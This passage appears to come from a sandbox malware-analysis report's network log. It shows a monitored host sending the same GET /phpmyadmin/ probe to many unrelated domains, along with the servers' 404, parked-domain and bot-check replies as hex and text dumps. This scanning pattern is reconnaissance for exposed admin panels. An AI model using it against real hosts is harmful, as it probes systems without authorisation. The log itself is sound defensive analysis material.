67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 ef e5 1c fc bb a6 89 e8 01 c8 f2 12 df 67 35 04 c9 8c ac 21 8f ee 15 2c 1a eb 42 c4 0a 6b 02 98 40 ac 65 a8 f2 12 ee 55 01 bc 3b 1c 29 a3 82 92 9a fb 42 6a c8 d3 23 56 cb a5 aa db fa 3f 42 eb c1 75 27 39 c5 17 c6 a2 be b5 a2 a2 92 ce 03 0a 6e c3 8c 4f b6 2e aa 10 1a 0e 5f 5a 75 9f 47 7f f3 0f ef f8 95 ad 1b 19 14 4a d8 32 e7 e6 3a 87 72 0e 3d 5f 50 41 03 81 9c 2a 53 e6 51 dc 20 bc cf 1d 31 66 ff b2 e0 a4 f1 5a 06 7c 9c 89 8e fa 18 6e 09 be 70 aa 09 ca 9a 2d 15 5b 36 ed e1 95 1d 2e 67 a7 36 f8 2d b9 c6 a2 95 b0 3c 62 c6 ce ac d6 76 d1 b3 6c 02 4a a1 cb b4 32 77 8c 82 9a 47 aa 46 38 a2 31 f3 88 55 0e 66 79 24 c4 62 b1 48 30 96 49 61 6b 31 93 18 12 6b 12 fc 8a 98 03 9d 47 be c2 d0 15 6d 60 44 df 11 de 8b 5e 4b f2 01 5d 5b 24 8d 74 d2 07 eb 50 53 27 14 e3 46 81 f6 22 54 ca 95 1c af c3 4a cc 30 17 bc f8 1d f4 3d 20 8f ec ce bf c9 02 39 3c e2 eb 55 87 95 06 5f 01 60 ea f4 d6 07 58 06 d1 3d 10 9d db b7 60 f6 96 ec f0 3d d7 34 74 00 6f da a9 56 85 48 93 b3 f4 3c 19 09 df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b5 e5 8a 69 69 e6 79 04 18 7f Data Ascii: 442Vo6_E-,N&Pl((Z:[L(R%Fw9ql7c!q~ypXj}g~6#3s.&jyug5!,Bk@eU;)Bj#V?Bu'9nO._ZuGJ2:r=_PA*SQ 1fZ\|np-[6.g6-<bvlJ2wGF81Ufy$bH0Iak1kGm`D^K][$tPS'F"TJ0= 9<U_`X=`=4toVH<@9Fc3g~6iiy
Feb 21, 2024 00:26:09.793004036 CET	627	IN	Data Raw: 4c 23 4a 7a 87 a1 01 97 47 9b 7a b9 da 10 99 f4 ac 53 41 65 74 15 9c c6 e0 6a e9 3d f2 6f 14 53 bd f5 b2 fa 9b af b1 07 14 5b 4a b7 e2 53 59 dc cd 9d 6d 4d 19 5f 30 e5 ff 5a 5f fc b2 a1 7f 43 5b c9 53 1f d5 8c e9 c0 6e ae d9 f9 27 a4 f4 59 ca bc Data Ascii: L#JzGzSAetj=oS[JSYmM_0Z_C[Sn'Y+(S+UqV&EdDe2vA6wA4/-?%`J5u<(;A71NFYymkjn='ONWpGJ'fkKM3 xuP7uS

Session ID	Source IP	Source Port	Destination IP	Destination Port
155	192.168.2.6	56882	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.692450047 CET	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.006155014 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
156	192.168.2.6	57019	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.705452919 CET	174	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.883857012 CET	432	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:09 GMT server: Apache set-cookie: __tad=1708471569.8866612; expires=Fri, 17-Feb-2034 23:26:09 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
157	192.168.2.6	57045	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.745117903 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.928420067 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:09 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 38 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 Data Ascii: 588<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!
Feb 21, 2024 00:26:09.928466082 CET	477	IN	Data Raw: 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 Data Ascii: ![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : do
Feb 21, 2024 00:26:09.928517103 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
158	192.168.2.6	57273	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.769469976 CET	173	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.862762928 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:09 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: Y8NAHh1g/79ShWfnd Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:09.862803936 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:09.862844944 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:09.862885952 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:09.862936020 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:09.863010883 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:09.863065004 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:09.863152027 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:09.863224983 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:09.863292933 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:09.954510927 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port
159	192.168.2.6	57282	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.771405935 CET	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: publichouse.ie Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.864326000 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:09 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: pxQtxTMz/PyGxVFsP Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 